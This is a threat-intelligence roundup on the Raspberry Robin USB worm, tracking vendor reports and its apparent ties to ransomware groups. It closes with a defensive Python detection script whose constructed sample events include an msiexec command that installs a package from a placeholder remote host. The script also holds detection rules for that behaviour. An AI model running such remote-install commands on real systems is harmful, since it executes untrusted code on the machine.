Updated on 2022-11-23
The Sophos X-Ops team has a thread and IOCs on recent Raspberry Robin attacks.
NEW: On a recent threat hunt, our MDR team uncovered multiple Raspberry Robin infections using a DLL spreader.
The USB worm was first spotted in Sept 2021 by Red Canary. Back then, its purpose wasn’t clear. Since then, it’s spread – a lot.
— Sophos X-Ops (@SophosXOps) November 21, 2022
Updated on 2022-10-28: Raspberry Robin malware linked to ransomware attacks
In a report published on Thursday, Microsoft confirmed that in some cases systems infected with the Raspberry Robin USB worm served as entry points for hands-on-keyboard ransomware attacks, specifically with the Clop ransomware strain. Microsoft also confirmed IBM X-Force's findings that the Raspberry Robin malware was developed by the EvilCorp gang, the same group behind the Dridex banking trojan and the Locky and BitPaymer ransomware strains. Read more:
- Raspberry Robin worm part of larger ecosystem facilitating pre-ransomware activity
- Raspberry Robin and Dridex: Two Birds of a Feather
Updated on 2022-10-27
Microsoft found that almost 3,000 devices in roughly 1,000 organizations had triggered a Raspberry Robin payload-related alert in the previous 30 days.
Update on 2022-09-26: Raspberry Robin activity surge
Update on 2022-08-05: Raspberry Robin
Microsoft said on Friday that it had seen instances where the Raspberry Robin malware deployed the second-stage malware known as FakeUpdates/SocGholish.
The DEV-0206 and DEV-0243 partnership remains strong with the recent DEV-0206-associated deployment of FakeUpdates via existing Raspberry Robin infections, followed by DEV-0243 pre-ransomware behavior. More about this development in the RaaS ecosystem: https://t.co/g1sA0YddnM
— Microsoft Security Intelligence (@MsftSecIntel) July 28, 2022
Several security experts consider this a worrying development, as the SocGholish operation has previously been used to drop ransomware inside corporate networks.
Okay, backing up MS:
Raspberry Robin USB worm -> Tor traffic as above -> SocGholish -> ransomware group.
MS call it FakeUpdates but I don't think it's a great name, as it is not a fake update – it's the SocGholish RAT framework.
— Kevin Beaumont (@GossiTheDog) July 29, 2022
More from Katie Nickels, Director of Intelligence at Red Canary, the security firm that first observed Raspberry Robin in late 2021 and publicly documented it earlier this year.
“Many organizations have observed and publicly discussed Raspberry Robin’s initial execution behaviors, but there remained a major gap in that no one seems to have observed any later-stage activity—like an eventual payload. Microsoft’s finding that Raspberry Robin has deployed malware called FakeUpdates/SocGholish is an interesting development. Microsoft is certainly credible, but we can’t independently verify their claim at this time.
Raspberry Robin itself is an activity cluster that we created based on observed behaviors in multiple different environments. We continue to see Raspberry Robin activity, but we have not been able to associate it with any specific person, company, entity, or country. Ultimately, it’s too early to say if Evil Corp is responsible for, or associated with, Raspberry Robin. The Ransomware-as-a-Service (RaaS) ecosystem is a complex one, where different criminal groups partner with one another to achieve a variety of objectives. As a result, it can be difficult to untangle the relationships between malware families and observed activity.
Microsoft’s findings suggest that the adversaries behind Raspberry Robin may have some kind of relationship with DEV-0206 and DEV-0243, two groups tracked by Microsoft, but the exact nature of that relationship is unclear. Red Canary has not directly observed Raspberry Robin spreading SocGholish/FakeUpdates, nor are we aware of any clear connection to Evil Corp, DEV-0206, or DEV-0243, but we’re watching to see if more evidence emerges to solidify these relationships or if they were simply one-time occurrences.”
Update on 2022-07-15: Raspberry Robin
Cybereason researchers have published a technical report on the Raspberry Robin malware, which uses LNK files to infect its victims and is usually delivered through file archives, removable devices (USB), or ISO files. According to Cybereason, the majority of victims are located in Europe. A report on the same malware is also available from Red Canary.
Update on 2022-07-10: Raspberry Robin continues to spread
Microsoft told customers in a security alert last week to bolster their defenses against the Raspberry Robin malware, having found infections on the networks of hundreds of customers. Discovered by Red Canary last year, Raspberry Robin is a Windows worm that spreads through USB devices and often uses compromised QNAP NAS devices as command-and-control servers.
Overview: Raspberry Robin Spreads Via External Drives
Analysts from Red Canary have detected a worm that spreads via external USB drives. Dubbed Raspberry Robin, the malware uses the Microsoft Standard Installer (msiexec.exe) to communicate with its command-and-control infrastructure, which is largely made up of compromised QNAP devices.
- Even if you aren't interested in this particular malware, read it as a nice example of how to provide actionable information about detecting this type of malware; the particular techniques being used will likely be found in other malware as well.
- Am I the only one who thought this was a Raspberry Pi issue? Not so much. This is the loaded media problem; once again your QNAP devices are in the crosshairs. This reminds us to not allow autoplay on removable media, to only use trusted media, and ideally to scan it before inserting it into system components. Note that NGAV systems tend not to perform disk scanning; they scan when files are opened, so you need a separate process for that.
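The two behaviours the overview describes, a shortcut-launched command interpreter reading from removable media and msiexec.exe reaching out to a remote URL, are the kind of thing a detection engineer would turn into rules. The following is an added example, not code from Red Canary, Microsoft, Cybereason or Sophos: a small detection pass in Python over constructed process-creation events (Sysmon Event ID 1 or an EDR equivalent). The drive letters, hostnames, paths and command lines are placeholders constructed for the example, not observed indicators, and the LNK -> cmd.exe -> msiexec.exe chain it checks for is an assumption consistent with the description above rather than a published process tree.

```python
"""
Added example (not code from Red Canary, Microsoft, Cybereason or Sophos):
a small detection pass over process-creation events that flags the Raspberry
Robin behaviours described above -- a shortcut-launched command interpreter
reading from removable media, and msiexec.exe (the Microsoft Standard
Installer) given a remote URL.  All hosts, paths and command lines below are
constructed placeholders, not observed indicators.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 or an EDR equivalent),
    reduced to the three fields the rules need."""
    parent_image: str
    image: str
    command_line: str


# Assumption: the drive letters currently backed by removable media, as a
# device-inventory step would supply.  Constructed for this example.
REMOVABLE_DRIVES = frozenset({"E:", "F:"})

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
# A drive letter followed by ':\' (e.g. 'E:\Setup\run.cmd'); 'http://' does not match.
DRIVE_RE = re.compile(r"\b([A-Za-z]):\\")


def _basename(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def removable_drive_refs(command_line: str) -> frozenset[str]:
    """Drive letters in the command line (e.g. 'E:') that map to removable media."""
    letters = {m.group(1).upper() + ":" for m in DRIVE_RE.finditer(command_line)}
    return frozenset(letters) & REMOVABLE_DRIVES


def match_rules(ev: ProcEvent, allowed_msi_hosts: frozenset[str] = frozenset()) -> list[str]:
    """Names of the rules this single event trips (empty list when nothing fires)."""
    hits: list[str] = []
    image, parent, cmd = _basename(ev.image), _basename(ev.parent_image), ev.command_line

    # Rule 1: a command interpreter started from the shell (a double-clicked LNK
    # runs under explorer.exe) whose command line points back at removable media.
    if image == "cmd.exe" and parent == "explorer.exe" and removable_drive_refs(cmd):
        hits.append("cmd_from_removable_media")

    # Rule 2: msiexec.exe handed a remote URL.  Deployment tools do install
    # straight from HTTP, so the tuning knob is an allowlist of the
    # distribution hosts the environment actually uses.
    if image == "msiexec.exe":
        hosts = {h for h in (urlparse(u).hostname for u in URL_RE.findall(cmd)) if h}
        if hosts - allowed_msi_hosts:
            hits.append("msiexec_remote_url")
            # Rule 3: the same msiexec launched by cmd.exe rather than by a
            # deployment service -- the chain this example assumes for a
            # shortcut-driven infection (LNK -> cmd.exe -> msiexec.exe).
            if parent == "cmd.exe":
                hits.append("msiexec_spawned_by_cmd")
    return hits


def detect(events, allowed_msi_hosts=frozenset()):
    """Return [(index, [rule, ...]), ...] for every event that trips a rule."""
    findings = []
    for i, ev in enumerate(events):
        hits = match_rules(ev, allowed_msi_hosts)
        if hits:
            findings.append((i, hits))
    return findings


# Constructed sample telemetry (placeholder hosts and paths; not real IOCs).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c E:\Setup\run.cmd"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /q /i http://update.example.net:8080/pkg/"),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i https://dl.example-vendor.com/agent.msi /qn"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c dir C:\Users"),
]

# Assumed allowlist: the one host this environment legitimately installs from.
ALLOWED_MSI_HOSTS = frozenset({"dl.example-vendor.com"})

if __name__ == "__main__":
    for index, rules in detect(SAMPLE_EVENTS, ALLOWED_MSI_HOSTS):
        print(f"event {index}: {SAMPLE_EVENTS[index].command_line!r} -> {rules}")
```

Run against the constructed sample, events 0 and 1 fire (the removable-drive cmd.exe, and the msiexec.exe contacting an unknown host from under cmd.exe) while the allowlisted vendor install and the ordinary cmd.exe on the system drive stay quiet. The allowlist is the part that needs real tuning: without it, rule 2 fires on every URL-based MSI install, which is exactly the noise that makes such a rule get switched off.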